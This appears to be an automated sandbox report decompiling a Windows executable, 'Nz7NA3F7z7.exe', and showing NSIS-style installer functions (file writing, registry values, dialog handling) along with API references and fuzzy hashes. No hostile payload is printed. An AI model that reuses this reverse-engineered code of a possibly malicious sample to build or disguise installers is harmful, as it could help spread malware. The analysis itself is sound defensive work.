                                                                                    				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                                    					_t17 =  &(_t17[4]);
                                                                                    				}
                                                                                    				if( *_t17 != 0 && E00405727(_t17) != 0) {
                                                                                    					_t17 =  &(_t17[2]);
                                                                                    				}
                                                                                    				_t5 =  *_t17;
                                                                                    				_t15 = _t17;
                                                                                    				_t16 = _t17;
                                                                                    				if(_t5 != 0) {
                                                                                    					do {
                                                                                    						if(_t5 > 0x1f &&  *((char*)(E004056E5("*?|<>/\":", _t5))) == 0) {
                                                                                    							E0040585F(_t16, _t17, CharNextA(_t17) - _t17);
                                                                                    							_t16 = CharNextA(_t16);
                                                                                    						}
                                                                                    						_t17 = CharNextA(_t17);
                                                                                    						_t5 =  *_t17;
                                                                                    					} while (_t5 != 0);
                                                                                    				}
                                                                                    				 *_t16 =  *_t16 & 0x00000000;
                                                                                    				while(1) {
                                                                                    					_t16 = CharPrevA(_t15, _t16);
                                                                                    					_t7 =  *_t16;
                                                                                    					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                    						break;
                                                                                    					}
                                                                                    					 *_t16 =  *_t16 & 0x00000000;
                                                                                    					if(_t15 < _t16) {
                                                                                    						continue;
                                                                                    					}
                                                                                    					break;
                                                                                    				}
                                                                                    				return _t7;
                                                                                    			}








                                                                                    0x00405e2b
                                                                                    0x00405e33
                                                                                    0x00405e47
                                                                                    0x00405e47
                                                                                    0x00405e4d
                                                                                    0x00405e5a
                                                                                    0x00405e5a
                                                                                    0x00405e5b
                                                                                    0x00405e5d
                                                                                    0x00405e61
                                                                                    0x00405e63
                                                                                    0x00405e6c
                                                                                    0x00405e6e
                                                                                    0x00405e88
                                                                                    0x00405e90
                                                                                    0x00405e90
                                                                                    0x00405e95
                                                                                    0x00405e97
                                                                                    0x00405e99
                                                                                    0x00405e9d
                                                                                    0x00405e9e
                                                                                    0x00405ea1
                                                                                    0x00405ea9
                                                                                    0x00405eab
                                                                                    0x00405eaf
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405eb5
                                                                                    0x00405eba
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405eba
                                                                                    0x00405ebf

                                                                                    APIs
                                                                                    • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Nz7NA3F7z7.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                                                                                    • CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                                                                                    • CharNextA.USER32(?,"C:\Users\user\Desktop\Nz7NA3F7z7.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                                                                                    • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Char$Next$Prev
                                                                                    • String ID: "C:\Users\user\Desktop\Nz7NA3F7z7.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 589700163-620660263
                                                                                    • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                                                    • Instruction ID: 6784d5a4761720cd8368ccbdd0638492f40d0cd734ea18b92361b53ebca16514
                                                                                    • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                                                    • Instruction Fuzzy Hash: BA11E671804B9129EB3217248C44B7B7F89CB5A7A0F18407BE5D5722C2C77C5E429EAD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00403EEA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                    				struct tagLOGBRUSH _v16;
                                                                                    				long _t35;
                                                                                    				long _t37;
                                                                                    				void* _t40;
                                                                                    				long* _t49;
                                                                                    
                                                                                    				if(_a4 + 0xfffffecd > 5) {
                                                                                    					L15:
                                                                                    					return 0;
                                                                                    				}
                                                                                    				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                                                                    				if(_t49 == 0) {
                                                                                    					goto L15;
                                                                                    				}
                                                                                    				_t35 =  *_t49;
                                                                                    				if((_t49[5] & 0x00000002) != 0) {
                                                                                    					_t35 = GetSysColor(_t35);
                                                                                    				}
                                                                                    				if((_t49[5] & 0x00000001) != 0) {
                                                                                    					SetTextColor(_a8, _t35);
                                                                                    				}
                                                                                    				SetBkMode(_a8, _t49[4]);
                                                                                    				_t37 = _t49[1];
                                                                                    				_v16.lbColor = _t37;
                                                                                    				if((_t49[5] & 0x00000008) != 0) {
                                                                                    					_t37 = GetSysColor(_t37);
                                                                                    					_v16.lbColor = _t37;
                                                                                    				}
                                                                                    				if((_t49[5] & 0x00000004) != 0) {
                                                                                    					SetBkColor(_a8, _t37);
                                                                                    				}
                                                                                    				if((_t49[5] & 0x00000010) != 0) {
                                                                                    					_v16.lbStyle = _t49[2];
                                                                                    					_t40 = _t49[3];
                                                                                    					if(_t40 != 0) {
                                                                                    						DeleteObject(_t40);
                                                                                    					}
                                                                                    					_t49[3] = CreateBrushIndirect( &_v16);
                                                                                    				}
                                                                                    				return _t49[3];
                                                                                    			}








                                                                                    0x00403efc
                                                                                    0x00403f90
                                                                                    0x00000000
                                                                                    0x00403f90
                                                                                    0x00403f0d
                                                                                    0x00403f11
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403f17
                                                                                    0x00403f20
                                                                                    0x00403f23
                                                                                    0x00403f23
                                                                                    0x00403f29
                                                                                    0x00403f2f
                                                                                    0x00403f2f
                                                                                    0x00403f3b
                                                                                    0x00403f41
                                                                                    0x00403f48
                                                                                    0x00403f4b
                                                                                    0x00403f4e
                                                                                    0x00403f50
                                                                                    0x00403f50
                                                                                    0x00403f58
                                                                                    0x00403f5e
                                                                                    0x00403f5e
                                                                                    0x00403f68
                                                                                    0x00403f6d
                                                                                    0x00403f70
                                                                                    0x00403f75
                                                                                    0x00403f78
                                                                                    0x00403f78
                                                                                    0x00403f88
                                                                                    0x00403f88
                                                                                    0x00000000

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2320649405-0
                                                                                    • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                    • Instruction ID: d9f5f29c4b32eaf67df6904808fcf7c938901a1e5be6cbe83ca05de02e5bcf8c
                                                                                    • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                    • Instruction Fuzzy Hash: A9215471904745ABC7219F78DD08B4BBFF8AF01715F04856AE856E22E0D734EA04CB55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 86%
                                                                                    			E004026AF(struct _OVERLAPPED* __ebx) {
                                                                                    				void* _t27;
                                                                                    				long _t32;
                                                                                    				struct _OVERLAPPED* _t47;
                                                                                    				void* _t51;
                                                                                    				void* _t53;
                                                                                    				void* _t56;
                                                                                    				void* _t57;
                                                                                    				void* _t58;
                                                                                    
                                                                                    				_t47 = __ebx;
                                                                                    				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
                                                                                    				_t52 = E00402A29(0xfffffff0);
                                                                                    				 *(_t58 - 0x38) = _t24;
                                                                                    				if(E00405727(_t52) == 0) {
                                                                                    					E00402A29(0xffffffed);
                                                                                    				}
                                                                                    				E0040587F(_t52);
                                                                                    				_t27 = E0040589E(_t52, 0x40000000, 2);
                                                                                    				 *(_t58 + 8) = _t27;
                                                                                    				if(_t27 != 0xffffffff) {
                                                                                    					_t32 =  *0x42ec34;
                                                                                    					 *(_t58 - 0x30) = _t32;
                                                                                    					_t51 = GlobalAlloc(0x40, _t32);
                                                                                    					if(_t51 != _t47) {
                                                                                    						E004030E2(_t47);
                                                                                    						E004030B0(_t51,  *(_t58 - 0x30));
                                                                                    						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
                                                                                    						 *(_t58 - 0x34) = _t56;
                                                                                    						if(_t56 != _t47) {
                                                                                    							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
                                                                                    							while( *_t56 != _t47) {
                                                                                    								_t49 =  *_t56;
                                                                                    								_t57 = _t56 + 8;
                                                                                    								 *(_t58 - 0x48) =  *_t56;
                                                                                    								E0040585F( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                                                                                    								_t56 = _t57 +  *(_t58 - 0x48);
                                                                                    							}
                                                                                    							GlobalFree( *(_t58 - 0x34));
                                                                                    						}
                                                                                    						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
                                                                                    						GlobalFree(_t51);
                                                                                    						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
                                                                                    					}
                                                                                    					CloseHandle( *(_t58 + 8));
                                                                                    				}
                                                                                    				_t53 = 0xfffffff3;
                                                                                    				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
                                                                                    					_t53 = 0xffffffef;
                                                                                    					DeleteFileA( *(_t58 - 0x38));
                                                                                    					 *((intOrPtr*)(_t58 - 4)) = 1;
                                                                                    				}
                                                                                    				_push(_t53);
                                                                                    				E00401423();
                                                                                    				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t58 - 4));
                                                                                    				return 0;
                                                                                    			}











                                                                                    0x004026af
                                                                                    0x004026b1
                                                                                    0x004026bd
                                                                                    0x004026c0
                                                                                    0x004026ca
                                                                                    0x004026ce
                                                                                    0x004026ce
                                                                                    0x004026d4
                                                                                    0x004026e1
                                                                                    0x004026e9
                                                                                    0x004026ec
                                                                                    0x004026f2
                                                                                    0x00402700
                                                                                    0x00402705
                                                                                    0x00402709
                                                                                    0x0040270c
                                                                                    0x00402715
                                                                                    0x00402721
                                                                                    0x00402725
                                                                                    0x00402728
                                                                                    0x00402732
                                                                                    0x00402751
                                                                                    0x00402739
                                                                                    0x0040273e
                                                                                    0x00402746
                                                                                    0x00402749
                                                                                    0x0040274e
                                                                                    0x0040274e
                                                                                    0x00402758
                                                                                    0x00402758
                                                                                    0x0040276a
                                                                                    0x00402771
                                                                                    0x00402783
                                                                                    0x00402783
                                                                                    0x00402789
                                                                                    0x00402789
                                                                                    0x00402794
                                                                                    0x00402795
                                                                                    0x00402799
                                                                                    0x0040279d
                                                                                    0x004027a3
                                                                                    0x004027a3
                                                                                    0x004027aa
                                                                                    0x00402197
                                                                                    0x004028c1
                                                                                    0x004028cd

                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                                                                    • GlobalFree.KERNEL32 ref: 00402758
                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                                                                                    • GlobalFree.KERNEL32 ref: 00402771
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                                                                                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3294113728-0
                                                                                    • Opcode ID: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                                                                                    • Instruction ID: 7359f6b8c72d8bce8f96c3519292fde75c250a44c6e0f48ea69dd088617f1d2a
                                                                                    • Opcode Fuzzy Hash: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                                                                                    • Instruction Fuzzy Hash: 9D319C71C00028BBCF216FA5DE88DAEBA79EF04364F14423AF914762E0C67949018B99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00404EB3(CHAR* _a4, CHAR* _a8) {
                                                                                    				struct HWND__* _v8;
                                                                                    				signed int _v12;
                                                                                    				CHAR* _v32;
                                                                                    				long _v44;
                                                                                    				int _v48;
                                                                                    				void* _v52;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				CHAR* _t26;
                                                                                    				signed int _t27;
                                                                                    				CHAR* _t28;
                                                                                    				long _t29;
                                                                                    				signed int _t39;
                                                                                    
                                                                                    				_t26 =  *0x42e404;
                                                                                    				_v8 = _t26;
                                                                                    				if(_t26 != 0) {
                                                                                    					_t27 =  *0x42ecd4;
                                                                                    					_v12 = _t27;
                                                                                    					_t39 = _t27 & 0x00000001;
                                                                                    					if(_t39 == 0) {
                                                                                    						E00405BE9(0, _t39, 0x429878, 0x429878, _a4);
                                                                                    					}
                                                                                    					_t26 = lstrlenA(0x429878);
                                                                                    					_a4 = _t26;
                                                                                    					if(_a8 == 0) {
                                                                                    						L6:
                                                                                    						if((_v12 & 0x00000004) == 0) {
                                                                                    							_t26 = SetWindowTextA( *0x42e3e8, 0x429878);
                                                                                    						}
                                                                                    						if((_v12 & 0x00000002) == 0) {
                                                                                    							_v32 = 0x429878;
                                                                                    							_v52 = 1;
                                                                                    							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                                                    							_v44 = 0;
                                                                                    							_v48 = _t29 - _t39;
                                                                                    							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                                                    							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                                                    						}
                                                                                    						if(_t39 != 0) {
                                                                                    							_t28 = _a4;
                                                                                    							 *((char*)(_t28 + 0x429878)) = 0;
                                                                                    							return _t28;
                                                                                    						}
                                                                                    					} else {
                                                                                    						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                                                    						if(_t26 < 0x800) {
                                                                                    							_t26 = lstrcatA(0x429878, _a8);
                                                                                    							goto L6;
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    				return _t26;
                                                                                    			}

















                                                                                    0x00404eb9
                                                                                    0x00404ec5
                                                                                    0x00404ec8
                                                                                    0x00404ece
                                                                                    0x00404eda
                                                                                    0x00404edd
                                                                                    0x00404ee0
                                                                                    0x00404ee6
                                                                                    0x00404ee6
                                                                                    0x00404eec
                                                                                    0x00404ef4
                                                                                    0x00404ef7
                                                                                    0x00404f14
                                                                                    0x00404f18
                                                                                    0x00404f21
                                                                                    0x00404f21
                                                                                    0x00404f2b
                                                                                    0x00404f34
                                                                                    0x00404f40
                                                                                    0x00404f47
                                                                                    0x00404f4b
                                                                                    0x00404f4e
                                                                                    0x00404f61
                                                                                    0x00404f6f
                                                                                    0x00404f6f
                                                                                    0x00404f73
                                                                                    0x00404f75
                                                                                    0x00404f78
                                                                                    0x00000000
                                                                                    0x00404f78
                                                                                    0x00404ef9
                                                                                    0x00404f01
                                                                                    0x00404f09
                                                                                    0x00404f0f
                                                                                    0x00000000
                                                                                    0x00404f0f
                                                                                    0x00404f09
                                                                                    0x00404ef7
                                                                                    0x00404f82

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(00429878,00000000,0041AF03,74B5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                    • lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041AF03,74B5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                    • lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041AF03,74B5EA30), ref: 00404F0F
                                                                                    • SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                    • String ID:
                                                                                    • API String ID: 2531174081-0
                                                                                    • Opcode ID: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
                                                                                    • Instruction ID: b2aff46cb4fd7b93265c813df518c908744a9a116baeb32a25c95395085da7a4
                                                                                    • Opcode Fuzzy Hash: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
                                                                                    • Instruction Fuzzy Hash: BA219D71900118BFDB119FA5CD80DDEBFB9EF45354F14807AF544B62A0C739AE408BA8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00404782(struct HWND__* _a4, intOrPtr _a8) {
                                                                                    				long _v8;
                                                                                    				signed char _v12;
                                                                                    				unsigned int _v16;
                                                                                    				void* _v20;
                                                                                    				intOrPtr _v24;
                                                                                    				long _v56;
                                                                                    				void* _v60;
                                                                                    				long _t15;
                                                                                    				unsigned int _t19;
                                                                                    				signed int _t25;
                                                                                    				struct HWND__* _t28;
                                                                                    
                                                                                    				_t28 = _a4;
                                                                                    				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                                    				if(_a8 == 0) {
                                                                                    					L4:
                                                                                    					_v56 = _t15;
                                                                                    					_v60 = 4;
                                                                                    					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                                    					return _v24;
                                                                                    				}
                                                                                    				_t19 = GetMessagePos();
                                                                                    				_v16 = _t19 >> 0x10;
                                                                                    				_v20 = _t19;
                                                                                    				ScreenToClient(_t28,  &_v20);
                                                                                    				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                                    				if((_v12 & 0x00000066) != 0) {
                                                                                    					_t15 = _v8;
                                                                                    					goto L4;
                                                                                    				}
                                                                                    				return _t25 | 0xffffffff;
                                                                                    			}














                                                                                    0x00404790
                                                                                    0x0040479d
                                                                                    0x004047a3
                                                                                    0x004047e1
                                                                                    0x004047e1
                                                                                    0x004047f0
                                                                                    0x004047f7
                                                                                    0x00000000
                                                                                    0x004047f9
                                                                                    0x004047a5
                                                                                    0x004047b4
                                                                                    0x004047bc
                                                                                    0x004047bf
                                                                                    0x004047d1
                                                                                    0x004047d7
                                                                                    0x004047de
                                                                                    0x00000000
                                                                                    0x004047de
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040479D
                                                                                    • GetMessagePos.USER32 ref: 004047A5
                                                                                    • ScreenToClient.USER32 ref: 004047BF
                                                                                    • SendMessageA.USER32(?,00001111,00000000,?), ref: 004047D1
                                                                                    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047F7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Message$Send$ClientScreen
                                                                                    • String ID: f
                                                                                    • API String ID: 41195575-1993550816
                                                                                    • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                                                    • Instruction ID: 33b793b453c736b4b125c672a543aeedee0a766b6fda49c4207ece5d665b0003
                                                                                    • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                                                    • Instruction Fuzzy Hash: A1019271D00219BADB01DB94CC41BFEBBBCAB49711F10012BBB00B71C0C3B465018BA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
                                                                                    				char _v68;
                                                                                    				int _t11;
                                                                                    				int _t20;
                                                                                    
                                                                                    				if(_a8 == 0x110) {
                                                                                    					SetTimer(_a4, 1, 0xfa, 0);
                                                                                    					_a8 = 0x113;
                                                                                    				}
                                                                                    				if(_a8 == 0x113) {
                                                                                    					_t20 =  *0x414c40; // 0x8600
                                                                                    					_t11 =  *0x428c50;
                                                                                    					if(_t20 >= _t11) {
                                                                                    						_t20 = _t11;
                                                                                    					}
                                                                                    					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                                                    					SetWindowTextA(_a4,  &_v68);
                                                                                    					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                                                    				}
                                                                                    				return 0;
                                                                                    			}






                                                                                    0x00402b7b
                                                                                    0x00402b89
                                                                                    0x00402b8f
                                                                                    0x00402b8f
                                                                                    0x00402b9d
                                                                                    0x00402b9f
                                                                                    0x00402ba5
                                                                                    0x00402bac
                                                                                    0x00402bae
                                                                                    0x00402bae
                                                                                    0x00402bc4
                                                                                    0x00402bd4
                                                                                    0x00402be6
                                                                                    0x00402be6
                                                                                    0x00402bee

                                                                                    APIs
                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                                                                    • MulDiv.KERNEL32(00008600,00000064,?), ref: 00402BB4
                                                                                    • wsprintfA.USER32 ref: 00402BC4
                                                                                    • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                                                                    • SetDlgItemTextA.USER32 ref: 00402BE6
                                                                                    Strings
                                                                                    • verifying installer: %d%%, xrefs: 00402BBE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                    • String ID: verifying installer: %d%%
                                                                                    • API String ID: 1451636040-82062127
                                                                                    • Opcode ID: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
                                                                                    • Instruction ID: 6a78b715a9a8e57134c517a6b1d06892db6ee10875a93ca7b4af16268fa1b879
                                                                                    • Opcode Fuzzy Hash: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
                                                                                    • Instruction Fuzzy Hash: 0C014470544208BBDF209F60DD49FEE3769FB04345F008039FA06A52D0DBB499558F95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 85%
                                                                                    			E00402336(void* __eax) {
                                                                                    				void* _t15;
                                                                                    				char* _t18;
                                                                                    				int _t19;
                                                                                    				char _t24;
                                                                                    				int _t27;
                                                                                    				intOrPtr _t35;
                                                                                    				void* _t37;
                                                                                    
                                                                                    				_t15 = E00402B1E(__eax);
                                                                                    				_t35 =  *((intOrPtr*)(_t37 - 0x18));
                                                                                    				 *(_t37 - 0x34) =  *(_t37 - 0x14);
                                                                                    				 *(_t37 - 0x38) = E00402A29(2);
                                                                                    				_t18 = E00402A29(0x11);
                                                                                    				 *(_t37 - 4) = 1;
                                                                                    				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x42ecd0 | 0x00000002, _t27, _t37 + 8, _t27);
                                                                                    				if(_t19 == 0) {
                                                                                    					if(_t35 == 1) {
                                                                                    						E00402A29(0x23);
                                                                                    						_t19 = lstrlenA(0x40a440) + 1;
                                                                                    					}
                                                                                    					if(_t35 == 4) {
                                                                                    						_t24 = E00402A0C(3);
                                                                                    						 *0x40a440 = _t24;
                                                                                    						_t19 = _t35;
                                                                                    					}
                                                                                    					if(_t35 == 3) {
                                                                                    						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a440, 0xc00);
                                                                                    					}
                                                                                    					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a440, _t19) == 0) {
                                                                                    						 *(_t37 - 4) = _t27;
                                                                                    					}
                                                                                    					_push( *(_t37 + 8));
                                                                                    					RegCloseKey();
                                                                                    				}
                                                                                    				 *0x42eca8 =  *0x42eca8 +  *(_t37 - 4);
                                                                                    				return 0;
                                                                                    			}










                                                                                    0x00402337
                                                                                    0x0040233c
                                                                                    0x00402346
                                                                                    0x00402350
                                                                                    0x00402353
                                                                                    0x0040236d
                                                                                    0x00402374
                                                                                    0x0040237c
                                                                                    0x0040238a
                                                                                    0x0040238e
                                                                                    0x00402399
                                                                                    0x00402399
                                                                                    0x0040239d
                                                                                    0x004023a1
                                                                                    0x004023a7
                                                                                    0x004023ac
                                                                                    0x004023ac
                                                                                    0x004023b0
                                                                                    0x004023bc
                                                                                    0x004023bc
                                                                                    0x004023d5
                                                                                    0x004023d7
                                                                                    0x004023d7
                                                                                    0x004023da
                                                                                    0x004024b0
                                                                                    0x004024b0
                                                                                    0x004028c1
                                                                                    0x004028cd

                                                                                    APIs
